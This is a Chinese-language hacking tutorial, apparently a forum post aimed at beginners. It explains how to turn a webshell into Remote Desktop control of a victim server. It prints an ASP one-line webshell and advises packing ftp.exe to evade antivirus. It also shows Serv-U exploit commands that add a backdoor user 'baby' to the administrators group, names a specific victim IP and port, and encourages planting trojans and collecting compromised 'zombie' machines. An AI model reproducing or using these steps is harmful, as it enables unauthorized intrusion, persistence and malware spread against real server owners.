大家好，我是爱情密码：QQ：30989950
今天做一个菜鸟获得webshell并同时如何夺取3389的教程

这里我相信大家好多菜鸟都有自己的webshell了，只是不知道如何去提升权限从而得到3389。今天我就给大家讲一下。
其中有些思路还是比较适合菜鸟们学习的。。

这个是我进入对方的后台，下面我就先介绍一下如何进入对方后台获得webshell。
有些菜鸟们进入了后台还不知道怎么去提升权限。今天我讲的是其中的一种方法。
这里用到了一句话代码，是海阳最新2006里的。大家可以去网上搜索下载的。

这就是那一句话代码，很小的。    <%eval(request("#"))%>

下面看我如何利用。
查看源代码根本看不出这句代码来，嘿嘿。再看我如何利用。

把地址复制到这个地方。别忘记点那个+号，+号里的那个黑点表示密码是#

这就是一句话的代码，其中#表示密码（具体看我操作）别忘记点那个+号，否则不成功。
看出来了，呵呵，成功获得webshell。
lcxMarcos是登陆的密码，#是连接的密码，大家不要搞浑了。

得到webshell后我们可以进行以下的工作：
1、挂马。利用那句挂马的代码挂上自己喜欢的马。呵呵。我这也就不演示了。
2、看是否装了pcanywhere，可以进行方便的控制。我们去看看，
C:\documents and settings\All Users\Application Data\ 这里如果有sysmantec这个文件夹的话就表示装了pcanywhere，可惜这没有。否则我们可以下载下来破解一下地。
3、利用比较流行的FTP来进行相关利用，这是我们今天介绍的重点，下面看我操作。。。。
这里要注意，我们直接看C盘时他显示的是 目录不存在或者不允许访问!
那么我们可以直接输入C:\documents and settings\来进行访问，

菜鸟们记住了：C:\documents and settings\All Users\Documents\这个目录是任意人可以写入东西的，有很多的目录都是不能写的，这个是可以写的。
下面我们上传http://www.hack58.com。看，上传成功了。

f是利用ftp来进行溢出的，大家在上传后往往发现http://www.hack58.com没有了，这是因为杀毒软件给干掉了。
不过我们可以将ftp.exe来进行加壳，让杀毒软件无法杀到。这样不就可以了么？要动脑子地。

下面看。。。。

C:\documents and settings\All Users\Documents\ftp.exe "net user baby 123123 /add"

这就是ftp利用的代码，菜鸟们记住了！

net user baby 123123 /add
这句话是表示填加一个用户名为baby，密码为123123的用户，来看能否成功。基本上大多数的时候我们都要点Ws criptShell，因为cmd.exe我试了好多次基本上都没有戏！点运行，呵呵，看看成果。

这里还要强调一点Serv-U FTP Server v5.1 for WinSock ready可以看出ftp的版本，如果你有时用这样的方法很长时间没有反映或者出来是6.几的版本，那你不成功也是情里之中的，大家不要见怪哦。

继续。。。
C:\documents and settings\All Users\Documents\ftp.exe "net localgroup administrators baby /add"

这句话是表示将刚填加的baby用户提升到管理员组。。。net localgroup administrators baby /add

继续，点运行。成功了，我们看看。嘿嘿。晕，不让看，那我们就连接试一下撒。

当前终端服务端口: 63389  58.241.178.8这是IP，我们连接时输入的连接方式就是58.241.178.8:63389
如果这里的服务端口是3389，那我们可以直接输入IP就行了。
看到了吧，连接成功。那我们输入刚才的用户名和密码看看。
用户名baby，密码123123

嘿嘿，连接成功了，表示我们刚才做的工作都ok。配置一般了，嘿嘿。

好了，成功得到3389了，这样看起来很舒服的！这台机子大家还是不要来试了！祝大家好晕，菜鸟们多多努力，一定会有很多的3389肉鸡的。不要总是挂马，不要总是要灰鸽子，也不要让偶再给你们刷QB了，偶从来不给刷的。呵呵。

我的群：忘记号了，还是加我Q吧，欢迎高手们来和我交流，菜鸟们。。。。。。